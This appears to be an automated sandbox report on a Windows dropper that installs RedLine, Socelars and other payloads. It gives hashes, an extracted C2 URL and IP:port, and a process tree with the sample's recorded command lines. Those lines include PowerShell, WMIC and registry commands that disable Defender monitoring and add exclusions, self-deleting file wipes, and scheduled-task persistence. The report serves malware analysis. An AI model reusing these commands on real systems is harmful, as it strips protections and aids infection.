Analysis
  max time kernel: 8s
  max time network: 149s
  platform: windows10_x64
  resource: win10-en-20211208
  submitted: 27/12/2021, 00:11

Static task: static1
Behavioral task: behavioral1
Sample: a485cb752e66e54c92ef00a9ae8f2eba.exe
Resource: win7-en-20211208

General
  Target: a485cb752e66e54c92ef00a9ae8f2eba.exe
  Size: 6.4MB
  MD5: a485cb752e66e54c92ef00a9ae8f2eba
  SHA1: c267fb5e1d5bd1abd6b3d4d4faea91587b600586
  SHA256: 1d7c3a08d1e69e704039850f64a88363fc6c9f3721907aa3c0d8165ae20de3a1
  SHA512: c8b4a0c892f00a395ad01edcc2798f1ba51c1efe94b7579c5f857277658f6ce18e6da46dfde3969fd1dfc45083de68552b86a8d16658816f2c91c8eec2b278b1

Malware Config
  Extracted: socelars
    http://www.chosenncrowned.com/
  Extracted: redline
    userv1
    159.69.246.184:13127
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid: 3960  pid_target: 852  Process: rundll32.exe  procid_target: 134

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (5 IoCs)
  resource  [yara_rule]
  behavioral2/memory/2292-284-0x0000000000400000-0x0000000000420000-memory.dmp  [family_redline]
  behavioral2/memory/2292-285-0x000000000041932A-mapping.dmp  [family_redline]
  behavioral2/memory/2292-291-0x0000000000400000-0x0000000000420000-memory.dmp  [family_redline]
  behavioral2/memory/2292-295-0x0000000000400000-0x0000000000420000-memory.dmp  [family_redline]
  behavioral2/memory/3280-339-0x0000000000CF0000-0x0000000000E44000-memory.dmp  [family_redline]

Socelars Payload (2 IoCs)
  resource  [yara_rule]
  behavioral2/files/0x000500000001ab38-226.dat  [family_socelars]
  behavioral2/files/0x000500000001ab38-172.dat  [family_socelars]

NirSoft WebBrowserPassView (2 IoCs)
Password recovery tool for various web browsers
  resource  [yara_rule]
  behavioral2/files/0x000500000001ab30-151.dat  [WebBrowserPassView]
  behavioral2/files/0x000500000001ab30-191.dat  [WebBrowserPassView]

Nirsoft (5 IoCs)
  resource  [yara_rule]
  behavioral2/files/0x000500000001ab30-151.dat  [Nirsoft]
  behavioral2/memory/2180-306-0x0000000000400000-0x0000000000455000-memory.dmp  [Nirsoft]
  behavioral2/files/0x000500000001ab6a-305.dat  [Nirsoft]
  behavioral2/files/0x000500000001ab6a-304.dat  [Nirsoft]
  behavioral2/files/0x000500000001ab30-191.dat  [Nirsoft]

yara_rule aspack_v212_v242 (6 matches)
  resource  [yara_rule]
  behavioral2/files/0x000500000001ab3c-123.dat  [aspack_v212_v242]
  behavioral2/files/0x000500000001ab3c-125.dat  [aspack_v212_v242]
  behavioral2/files/0x000500000001ab3d-122.dat  [aspack_v212_v242]
  behavioral2/files/0x000500000001ab3d-127.dat  [aspack_v212_v242]
  behavioral2/files/0x000600000001ab3f-129.dat  [aspack_v212_v242]
  behavioral2/files/0x000600000001ab3f-131.dat  [aspack_v212_v242]

Downloads MZ/PE file

Executes dropped EXE (16 IoCs)
  pid  Process
  3816  setup_installer.exe
  1792  setup_install.exe
  3096  Fri05e80376d7965136.exe
  3192  Fri0573cd0e4548.exe
  500  Fri05d87299ab2865e.exe
  412  Fri053a5ee7e3db.exe
  1120  Fri055ab567d9ab89d73.exe
  1272  Fri05f64325d01.exe
  1444  Fri0510f5b933f.exe
  1440  Fri05c25ad4f6fe4.exe
  2468  Fri0519054cecb36fc1b.exe
  2484  7c5832ae-0a76-4fe3-94c7-2764cb0ce5b5.exe
  2648  Fri0550507893048c.exe
  2660  Fri0510f5b933f.exe
  3968  Fri05cac54300eb.exe
  3860  Fri059521701074cbcde.exe

Modifies Windows Firewall (1 TTP)

Loads dropped DLL (6 IoCs)
  pid  Process
  1792  setup_install.exe  (6 entries)

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (7 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  30  ip-api.com
  100  ipinfo.io
  101  ipinfo.io
  194  ipinfo.io
  195  ipinfo.io
  250  ipinfo.io
  251  ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext (1 IoC)
  description: PID 1444 set thread context of 2660
  pid: 1444  Process: Fri0510f5b933f.exe  procid_target: 117

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (11 IoCs)
  pid  pid_target  Process  procid_target
  5916  5456  WerFault.exe  174
  5968  3040  WerFault.exe  160
  5908  5428  WerFault.exe  171
  2364  3040  WerFault.exe  160
  4832  3040  WerFault.exe  160
  5512  3040  WerFault.exe  160
  5412  3040  WerFault.exe  160
  5204  3040  WerFault.exe  160
  1244  3040  WerFault.exe  160
  5896  3040  WerFault.exe  160
  3712  3040  WerFault.exe  160

Creates scheduled task(s) (1 TTP, 5 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid  Process
  5112  schtasks.exe
  2372  schtasks.exe
  5628  schtasks.exe
  4248  schtasks.exe
  5832  schtasks.exe

Kills process with taskkill (4 IoCs)
  pid  Process
  1404  taskkill.exe
  1228  taskkill.exe
  5468  taskkill.exe
  2564  taskkill.exe

Suspicious use of AdjustPrivilegeToken (35 IoCs)
  pid 1120, Fri055ab567d9ab89d73.exe (1 entry):
    Token: SeDebugPrivilege
  pid 3968, Fri05cac54300eb.exe (34 entries):
    Token: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35

Suspicious use of WriteProcessMemory (64 IoCs)
  description  pid  Process  procid_target
  PID 1628 wrote to memory of 3816  1628  a485cb752e66e54c92ef00a9ae8f2eba.exe  68  (3 entries)
  PID 3816 wrote to memory of 1792  3816  setup_installer.exe  69  (3 entries)
  PID 1792 wrote to memory of 4308  1792  setup_install.exe  72  (3 entries)
  PID 1792 wrote to memory of 4368  1792  setup_install.exe  73  (3 entries)
  PID 1792 wrote to memory of 4360  1792  setup_install.exe  74  (3 entries)
  PID 1792 wrote to memory of 4416  1792  setup_install.exe  75  (3 entries)
  PID 1792 wrote to memory of 4408  1792  setup_install.exe  76  (3 entries)
  PID 1792 wrote to memory of 4320  1792  setup_install.exe  77  (3 entries)
  PID 1792 wrote to memory of 4312  1792  setup_install.exe  78  (3 entries)
  PID 1792 wrote to memory of 4448  1792  setup_install.exe  79  (3 entries)
  PID 1792 wrote to memory of 3260  1792  setup_install.exe  132  (3 entries)
  PID 1792 wrote to memory of 3880  1792  setup_install.exe  80  (3 entries)
  PID 1792 wrote to memory of 1604  1792  setup_install.exe  131  (3 entries)
  PID 4360 wrote to memory of 3096  4360  cmd.exe  81  (3 entries)
  PID 1792 wrote to memory of 2480  1792  setup_install.exe  130  (3 entries)
  PID 4416 wrote to memory of 3192  4416  cmd.exe  82  (3 entries)
  PID 1792 wrote to memory of 2492  1792  setup_install.exe  129  (3 entries)
  PID 4312 wrote to memory of 500  4312  cmd.exe  83  (3 entries)
  PID 4308 wrote to memory of 508  4308  cmd.exe  128  (3 entries)
  PID 1792 wrote to memory of 640  1792  setup_install.exe  84  (3 entries)
  PID 4368 wrote to memory of 900  4368  cmd.exe  127  (3 entries)
  PID 1792 wrote to memory of 1004  1792  setup_install.exe  85  (1 entry; listing truncated on the page)
Processes
(Tree indentation shows parent/child relationship; "cmd:" is the recorded command line, "sigs:" the signatures attributed to that process.)

- PID 1628: C:\Users\Admin\AppData\Local\Temp\a485cb752e66e54c92ef00a9ae8f2eba.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\a485cb752e66e54c92ef00a9ae8f2eba.exe"
    sigs: Suspicious use of WriteProcessMemory
  - PID 3816: C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      sigs: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - PID 1792: C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\setup_install.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\setup_install.exe"
        sigs: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
      - PID 4308: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          sigs: Suspicious use of WriteProcessMemory
        - PID 508: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      - PID 4368: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          sigs: Suspicious use of WriteProcessMemory
        - PID 900: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      - PID 4360: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Fri05e80376d7965136.exe
          sigs: Suspicious use of WriteProcessMemory
        - PID 3096: C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05e80376d7965136.exe
            cmd: Fri05e80376d7965136.exe
            sigs: Executes dropped EXE
          - PID 1984: C:\Users\Admin\AppData\Local\Temp\is-BUQME.tmp\Fri05e80376d7965136.tmp
              cmd: "C:\Users\Admin\AppData\Local\Temp\is-BUQME.tmp\Fri05e80376d7965136.tmp" /SL5="$8005E,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05e80376d7965136.exe"
      - PID 4416: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Fri0573cd0e4548.exe
          sigs: Suspicious use of WriteProcessMemory
        - PID 3192: C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0573cd0e4548.exe
            cmd: Fri0573cd0e4548.exe
            sigs: Executes dropped EXE
          - PID 3588: C:\Windows\SysWOW64\cmd.exe
              cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im Fri0573cd0e4548.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0573cd0e4548.exe" & del C:\ProgramData\*.dll & exit
            - PID 5468: C:\Windows\SysWOW64\taskkill.exe
                cmd: taskkill /im Fri0573cd0e4548.exe /f
                sigs: Kills process with taskkill
      - PID 4408: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Fri053a5ee7e3db.exe
        - PID 412: C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri053a5ee7e3db.exe
            cmd: Fri053a5ee7e3db.exe
            sigs: Executes dropped EXE
      - PID 4320: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Fri055ab567d9ab89d73.exe
        - PID 1120: C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri055ab567d9ab89d73.exe
            cmd: Fri055ab567d9ab89d73.exe
            sigs: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
      - PID 4312: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Fri05d87299ab2865e.exe
          sigs: Suspicious use of WriteProcessMemory
        - PID 500: C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05d87299ab2865e.exe
            cmd: Fri05d87299ab2865e.exe
            sigs: Executes dropped EXE
          - PID 4340: C:\Windows\SysWOW64\control.exe
              cmd: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",
            - PID 3564: C:\Windows\SysWOW64\rundll32.exe
                cmd: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",
              - PID 1508: C:\Windows\system32\RunDll32.exe
                  cmd: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",
                - PID 5216: C:\Windows\SysWOW64\rundll32.exe
                    cmd: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",
      - PID 4448: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Fri05f64325d01.exe
        - PID 1272: C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05f64325d01.exe
            cmd: Fri05f64325d01.exe
            sigs: Executes dropped EXE
          - PID 4256: C:\Users\Admin\AppData\Local\7f7b0dd0-4fdf-452d-aead-f1f911216baa.exe
              cmd: "C:\Users\Admin\AppData\Local\7f7b0dd0-4fdf-452d-aead-f1f911216baa.exe"
            - PID 5028: C:\Users\Admin\AppData\Roaming\40883256\500220240882664.exe
                cmd: "C:\Users\Admin\AppData\Roaming\40883256\500220240882664.exe"
          - PID 3280: C:\Users\Admin\AppData\Local\2a6edbc5-64c5-4134-9351-b555741cc9bb.exe
              cmd: "C:\Users\Admin\AppData\Local\2a6edbc5-64c5-4134-9351-b555741cc9bb.exe"
          - PID 1908: C:\Users\Admin\AppData\Local\f15438d6-566f-4f96-b904-fa72c0c9a3d3.exe
              cmd: "C:\Users\Admin\AppData\Local\f15438d6-566f-4f96-b904-fa72c0c9a3d3.exe"
            - PID 4324: C:\Users\Admin\AppData\Roaming\8313719.exe
                cmd: "C:\Users\Admin\AppData\Roaming\8313719.exe"
              - PID 4448: C:\Windows\SysWOW64\control.exe
                  cmd: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",
                - PID 2008: C:\Windows\SysWOW64\rundll32.exe
                    cmd: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",
                  - PID 4976: C:\Windows\system32\RunDll32.exe
                      cmd: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",
                    - PID 5764: C:\Windows\SysWOW64\rundll32.exe
                        cmd: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",
          - PID 4116: C:\Users\Admin\AppData\Local\c43aa6d5-ac06-450b-b812-a2538602be01.exe
              cmd: "C:\Users\Admin\AppData\Local\c43aa6d5-ac06-450b-b812-a2538602be01.exe"
      - PID 3880: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Fri0510f5b933f.exe /mixtwo
        - PID 1444: C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0510f5b933f.exe
            cmd: Fri0510f5b933f.exe /mixtwo
            sigs: Executes dropped EXE; Suspicious use of SetThreadContext
      - PID 640: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Fri0573351d0136.exe
        - PID 4884: C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0573351d0136.exe
            cmd: Fri0573351d0136.exe
      - PID 1004: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Fri0506cb2ead94f.exe
        - PID 3932: C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0506cb2ead94f.exe
            cmd: Fri0506cb2ead94f.exe
          - PID 5032: C:\Users\Admin\Pictures\Adobe Films\1_zCZOVXPqmK6ZhxCsSdirPQ.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\1_zCZOVXPqmK6ZhxCsSdirPQ.exe"
          - PID 4352: C:\Users\Admin\Pictures\Adobe Films\w3vgGIsJDXWLbrdEtxwdxAD5.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\w3vgGIsJDXWLbrdEtxwdxAD5.exe"
          - PID 2968: C:\Users\Admin\Pictures\Adobe Films\pizGiuqVn7zFmjN5fpg2oAto.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\pizGiuqVn7zFmjN5fpg2oAto.exe"
            - PID 3940: C:\Windows\SysWOW64\cmd.exe
                cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im pizGiuqVn7zFmjN5fpg2oAto.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\pizGiuqVn7zFmjN5fpg2oAto.exe" & del C:\ProgramData\*.dll & exit
              - PID 2564: C:\Windows\SysWOW64\taskkill.exe
                  cmd: taskkill /im pizGiuqVn7zFmjN5fpg2oAto.exe /f
                  sigs: Kills process with taskkill
          - PID 3120: C:\Users\Admin\Pictures\Adobe Films\T26AeTZg9ROMlIRlpgNdpF85.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\T26AeTZg9ROMlIRlpgNdpF85.exe"
            - PID 2024: C:\Users\Admin\Documents\Z7x18hhbn299M11pHMjJKC6t.exe
                cmd: "C:\Users\Admin\Documents\Z7x18hhbn299M11pHMjJKC6t.exe"
              - PID 6052: C:\Users\Admin\Pictures\Adobe Films\rDDBBbWvH5Ax97KNy0JvEMYl.exe
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\rDDBBbWvH5Ax97KNy0JvEMYl.exe"
              - PID 5300: C:\Users\Admin\Pictures\Adobe Films\tDTIQ3G6R3WOK_z_Rm7_FBZe.exe
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\tDTIQ3G6R3WOK_z_Rm7_FBZe.exe"
              - PID 5412: C:\Users\Admin\Pictures\Adobe Films\F7el0t34TK4CUBTle9uQqkRi.exe
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\F7el0t34TK4CUBTle9uQqkRi.exe"
              - PID 2096: C:\Users\Admin\Pictures\Adobe Films\TwV_jQbydUybcucyJ6iyEO0X.exe
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\TwV_jQbydUybcucyJ6iyEO0X.exe"
              - PID 5700: C:\Users\Admin\Pictures\Adobe Films\yOXB3nkta_SxemuFBpl9wJLa.exe
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\yOXB3nkta_SxemuFBpl9wJLa.exe"
              - PID 5772: C:\Users\Admin\Pictures\Adobe Films\SKjXe_kPtqrg74xRjf_DgKs7.exe
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\SKjXe_kPtqrg74xRjf_DgKs7.exe"
              - PID 1844: C:\Users\Admin\Pictures\Adobe Films\PRWbXeG_e49zfrixmPVq8gvD.exe
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\PRWbXeG_e49zfrixmPVq8gvD.exe"
              - PID 5900: C:\Users\Admin\Pictures\Adobe Films\EUeuyhxSpEl4R4e9nmZ5absb.exe
                  cmd: "C:\Users\Admin\Pictures\Adobe Films\EUeuyhxSpEl4R4e9nmZ5absb.exe"
            - PID 5112: C:\Windows\SysWOW64\schtasks.exe
                cmd: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                sigs: Creates scheduled task(s)
            - PID 2372: C:\Windows\SysWOW64\schtasks.exe
                cmd: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                sigs: Creates scheduled task(s)
          - PID 3040: C:\Users\Admin\Pictures\Adobe Films\XJ7SXEC77vQckQGIU_GL3Zfn.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\XJ7SXEC77vQckQGIU_GL3Zfn.exe"
            - PID 5968: C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 664
                sigs: Program crash
            - PID 2364: C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 684
                sigs: Program crash
            - PID 4832: C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 648
                sigs: Program crash
            - PID 5512: C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 672
                sigs: Program crash
            - PID 5412: C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 1128
                sigs: Program crash
            - PID 5204: C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 1152
                sigs: Program crash
            - PID 1244: C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 1164
                sigs: Program crash
            - PID 5896: C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 1204
                sigs: Program crash
            - PID 3712: C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 1248
                sigs: Program crash
          - PID 3252: C:\Users\Admin\Pictures\Adobe Films\BT7F_kmCMbgKkDFJccuR4z3Y.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\BT7F_kmCMbgKkDFJccuR4z3Y.exe"
          - PID 3080: C:\Users\Admin\Pictures\Adobe Films\nG2X8jGYVrEUxz6iT84iWF2O.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\nG2X8jGYVrEUxz6iT84iWF2O.exe"
          - PID 3096: C:\Users\Admin\Pictures\Adobe Films\pYRT_dCZOM5p5OZbCGX6CKLq.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\pYRT_dCZOM5p5OZbCGX6CKLq.exe"
            - PID 4380: C:\Users\Admin\AppData\Local\ab97ab4e-78b4-436a-a485-402b911fbaaa.exe
                cmd: "C:\Users\Admin\AppData\Local\ab97ab4e-78b4-436a-a485-402b911fbaaa.exe"
            - PID 3680: C:\Users\Admin\AppData\Local\c09b64db-2e1a-4915-b84d-e2ab5ac5d552.exe
                cmd: "C:\Users\Admin\AppData\Local\c09b64db-2e1a-4915-b84d-e2ab5ac5d552.exe"
            - PID 1088: C:\Users\Admin\AppData\Local\d10271ea-457f-4556-92e0-79e8095b8cfa.exe
                cmd: "C:\Users\Admin\AppData\Local\d10271ea-457f-4556-92e0-79e8095b8cfa.exe"
            - PID 4956: C:\Users\Admin\AppData\Local\a357f801-3c88-4b94-9bf3-404a9f0e16d3.exe
                cmd: "C:\Users\Admin\AppData\Local\a357f801-3c88-4b94-9bf3-404a9f0e16d3.exe"
              - PID 1228: C:\Users\Admin\AppData\Roaming\7111090.exe
                  cmd: "C:\Users\Admin\AppData\Roaming\7111090.exe"
                - PID 1660: C:\Windows\SysWOW64\control.exe
                    cmd: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",
                  - PID 1712: C:\Windows\SysWOW64\rundll32.exe
                      cmd: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",
          - PID 1672: C:\Users\Admin\Pictures\Adobe Films\YxrFKSlebSAGFqC7TPFcGLBl.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\YxrFKSlebSAGFqC7TPFcGLBl.exe"
          - PID 4956: C:\Users\Admin\Pictures\Adobe Films\g4UUpKssKWXdqLOan6IOwaKf.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\g4UUpKssKWXdqLOan6IOwaKf.exe"
          - PID 68: C:\Users\Admin\Pictures\Adobe Films\j4mXixRkNIxqO2p2ngZgWGTY.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\j4mXixRkNIxqO2p2ngZgWGTY.exe"
          - PID 5176: C:\Users\Admin\Pictures\Adobe Films\UNuXqLGbReKTbayd8HYIArIf.exe
              cmd: "C:\Users\Admin\Pictures\Adobe Films\UNuXqLGbReKTbayd8HYIArIf.exe"
            - PID 5756: C:\Users\Admin\AppData\Local\Temp\7zSC59E.tmp\Install.exe
                cmd: .\Install.exe
              - PID 5268: C:\Users\Admin\AppData\Local\Temp\7zSE635.tmp\Install.exe
                  cmd: .\Install.exe /S /site_id "525403"
                - PID 1876: C:\Windows\SysWOW64\cmd.exe
                    cmd: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                  - PID 5960: C:\Windows\SysWOW64\forfiles.exe
                      cmd: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                    - PID 4660: C:\Windows\SysWOW64\cmd.exe
                        cmd: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                      - PID 5152: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          cmd: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                        - PID 5980: C:\Windows\SysWOW64\Wbem\WMIC.exe
                            cmd: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                - PID 6052: C:\Windows\SysWOW64\forfiles.exe
                    cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                  - PID 6032: C:\Windows\SysWOW64\cmd.exe
                      cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                    - PID 6100: \??\c:\windows\SysWOW64\reg.exe
                        cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                    - PID 5204: \??\c:\windows\SysWOW64\reg.exe
                        cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                - PID 5412: C:\Windows\SysWOW64\forfiles.exe
                    cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                  - PID 6104: C:\Windows\SysWOW64\cmd.exe
